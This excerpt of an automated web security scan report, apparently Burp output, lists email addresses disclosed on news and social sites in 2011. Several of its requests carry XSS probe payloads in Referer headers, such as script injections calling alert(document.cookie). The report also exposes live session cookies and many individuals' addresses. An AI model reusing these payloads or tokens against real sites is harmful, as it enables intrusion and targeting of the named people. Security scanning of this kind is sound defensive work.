http://www.soundingsonline.com/contact-us
http://www.soundingsonline.com/features
http://www.soundingsonline.com/features/destinations
http://www.soundingsonline.com/features/in-depth
http://www.soundingsonline.com/features/justyesterday
http://www.soundingsonline.com/features/lifestyle
http://www.soundingsonline.com/features/profiles
http://www.soundingsonline.com/features/technical
http://www.soundingsonline.com/features/type-of-boat
http://www.soundingsonline.com/index.php
http://www.soundingsonline.com/more/digital-publications
http://www.soundingsonline.com/more/the-masters-series
http://www.soundingsonline.com/news
http://www.soundingsonline.com/news/coastwise
http://www.soundingsonline.com/news/dispatches
http://www.soundingsonline.com/news/home-waters
http://www.soundingsonline.com/news/mishaps-a-rescues
http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan
http://www.soundingsonline.com/news/mishaps-a-rescues/index.php
http://www.soundingsonline.com/news/sailing
http://www.soundingsonline.com/news/todays-top-stories
http://www.soundingsonline.com/resources
http://www.soundingsonline.com/s_code.js
http://www.soundingsonline.com/site-map
http://www.soundingsonline.com/subscription-services
http://www.soundingsonline.com/subscription-services/preview-current-issue
http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
http://www.zvents.com/javascripts/s_code.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

21.1. http://assets.nydailynews.com/js/nydn-pack-20101001.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/js/nydn-pack-20101001.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /js/nydn-pack-20101001.js HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=14515200
Content-Type: application/x-javascript
Content-Language: en
Age: 3426409
Date: Fri, 28 Jan 2011 14:14:28 GMT
Last-Modified: Sun, 19 Dec 2010 22:26:42 GMT
Expires: Sun, 05 Jun 2011 22:31:04 GMT
Connection: keep-alive
Content-Length: 163856

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

21.2. http://boston30.autochooser.com/results.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boston30.autochooser.com
Path:	/results.asp

Issue detail

The following email address was disclosed in the response:

carfind@carfind.com

Request

Response

21.3. http://bostonherald.com/blogs/entertainment/the_assistant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/entertainment/the_assistant/

Issue detail

The following email address was disclosed in the response:

megan.johnson@bostonherald.com

Request

GET /blogs/entertainment/the_assistant/?p=3065 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.4. http://bostonherald.com/blogs/lifestyle/fork_lift/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/lifestyle/fork_lift/

Issue detail

The following email address was disclosed in the response:

forklift@bostonherald.com

Request

GET /blogs/lifestyle/fork_lift/?p=3679 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.5. http://bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/

Issue detail

The following email addresses were disclosed in the response:

-lsweet@bostonherald.com
lsweet@bostonherald.com

Request

Response

21.6. http://bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

newstips@bostonherald.com

Request

GET /projects/your_tax_dollars.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.7. http://bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

GET /projects/your_tax_dollars.bg?src=Mefa HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.8. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The following email address was disclosed in the response:

irapoport@bostonherald.com

Request

Response

21.9. http://bostonherald.com/track/inside_track/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The following email address was disclosed in the response:

trackgals@bostonherald.com

Request

Response

21.10. http://events.cbs6albany.com/javascripts/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/javascripts/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /javascripts/s_code.js HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; Zvents=fnr9vfxsab

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:24 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sat, 29 Jan 2011 17:37:24 GMT
Cache-Control: max-age=86400
Content-Length: 39869

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

21.11. http://events.cbs6albany.com/opensearch/description150.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/opensearch/description150.xml

Issue detail

The following email address was disclosed in the response:

support@zvents.com

Request

GET /opensearch/description150.xml HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:02 GMT
Content-Type: text/xml
Content-Length: 1168
Last-Modified: Fri, 28 Jan 2011 08:15:40 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:02 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Zvents: Discover Things To Do</ShortName>
<Description>Use to discover things to
...[SNIP]...
<Contact>support@zvents.com</Contact>
...[SNIP]...

21.12. http://ezsub.net/isapi/foxisapi.dll/main.sv.run previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ezsub.net
Path:	/isapi/foxisapi.dll/main.sv.run

Issue detail

The following email address was disclosed in the response:

soundings@starrcorp.com

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<a href="mailto:soundings@starrcorp.com?subject=Soundings Subscription Inquiry">
soundings@starrcorp.com</a>
...[SNIP]...

21.13. http://hosted.ap.org/static/js/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/static/js/prototype.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /static/js/prototype.js HTTP/1.1
Host: hosted.ap.org
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Fri, 07 Dec 2007 07:41:57 GMT
ETag: "3437b2-d792-440ad618d1b40"
Accept-Ranges: bytes
Content-Length: 55186
Content-Type: text/x-js
Date: Sat, 29 Jan 2011 14:31:11 GMT
Connection: close

/* Prototype JavaScript framework, version 1.5.0_rc0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

21.14. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The following email addresses were disclosed in the response:

contact@appendTo.com
contact@appendto.com
hello@filamentgroup.com

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:50:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

21.15. http://support.moxiesoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.moxiesoft.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.16. http://twitter.com/LibertyHotel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/LibertyHotel

Issue detail

The following email addresses were disclosed in the response:

margatemondays@libertyhotel.com
margatemondays@liberythotel.com

Request

Response

21.17. http://twitter.com/ShaunieONeal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ShaunieONeal

Issue detail

The following email address was disclosed in the response:

info@amirahinc.com

Request

Response

21.18. http://twitter.com/about/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about/contact

Issue detail

The following email address was disclosed in the response:

partner@twitter.com

Request

GET /about/contact HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

21.19. http://twitter.com/favorites/toptweets.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/favorites/toptweets.json

Issue detail

The following email address was disclosed in the response:

RICHBROKEENT@GMAIL.COM

Request

Response

21.20. http://twitter.com/j_hollender previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/j_hollender

Issue detail

The following email address was disclosed in the response:

justin.hollender@gmail.com

Request

Response

21.21. http://twitter.com/javascripts/widgets/widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/javascripts/widgets/widget.js

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

GET /javascripts/widgets/widget.js HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:13:12 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 02:48:23 GMT
Accept-Ranges: bytes
Content-Length: 65153
Cache-Control: max-age=300
Expires: Fri, 28 Jan 2011 17:18:12 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/javascript

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

21.22. http://twitter.com/rachbarnhart previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rachbarnhart

Issue detail

The following email address was disclosed in the response:

rbarnhart@13wham.com

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

21.23. http://www.berkshireeagle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.berkshireeagle.com
Path:	/

Issue detail

The following email address was disclosed in the response:

news@berkshireeagle.com

Request

GET / HTTP/1.1
Host: www.berkshireeagle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The following email address was disclosed in the response:

rik.robinson@platform-a.com

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.25. http://www.bostonherald.com/about/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/about/contact/

Issue detail

The following email addresses were disclosed in the response:

carfind@carfind.com
gsher@bostonherald.com
homedelivery@bostonherald.com
jobfind@jobfind.com
khogan@bostonherald.com
letterstoeditor@bostonherald.com
smcdougall@heraldinteractive.com

Request

Response

21.26. http://www.bostonherald.com/about/home_delivery/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/about/home_delivery/

Issue detail

The following email addresses were disclosed in the response:

gsher@bostonherald.com
homedelivery@bostonherald.com
khogan@bostonherald.com

Request

Response

21.27. http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

Issue detail

The following email addresses were disclosed in the response:

JoeD@bostonherald.com
joed@bostonherald.com

Request

Response

21.28. http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/katy_on_the_campaign_trail/

Issue detail

The following email address was disclosed in the response:

heraldsquare@bostonherald.com

Request

Response

21.29. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The following email address was disclosed in the response:

holly@TuesdayAssociates.com

Request

Response

21.30. http://www.bostonherald.com/blogs/news/on_the_t/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/on_the_t/

Issue detail

The following email address was disclosed in the response:

heraldsquare@bostonherald.com

Request

Response

21.31. http://www.bostonherald.com/business/general/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view.bg

Issue detail

The following email address was disclosed in the response:

tgrillo@bostonherald.com

Request

Response

21.32. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

jfitz@bostonherald.com

Request

Response

21.33. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

jfitz@bostonherald.com

Request

Response

21.34. http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

-jfitz@bostonherald.com
jfitz@bostonherald.com

Request

Response

21.35. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The following email address was disclosed in the response:

tgrillo@bostonherald.com

Request

Response

21.36. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

Issue detail

The following email address was disclosed in the response:

tgrillo@bostonherald.com

Request

Response

21.37. http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

-tgrillo@bostonherald.com

Request

Response

21.38. http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

jvansack@bostonherald.com

Request

Response

21.39. http://www.bostonherald.com/entertainment/movies/reviews/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view.bg

Issue detail

The following email addresses were disclosed in the response:

-jverniere@bostonherald.com
jverniere@bostonherald.com

Request

Response

21.40. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The following email addresses were disclosed in the response:

-jverniere@bostonherald.com
jverniere@bostonherald.com

Request

Response

21.41. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

Issue detail

The following email addresses were disclosed in the response:

-jverniere@bostonherald.com
jverniere@bostonherald.com

Request

Response

21.42. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

-jverniere@bostonherald.com
jverniere@bostonherald.com

Request

Response

21.43. http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

jgottlieb@bostonherald.com

Request

Response

21.44. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

jvansack@bostonherald.com

Request

Response

21.45. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

jvansack@bostonherald.com

Request

Response

21.46. http://www.bostonherald.com/mediacenter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/

Issue detail

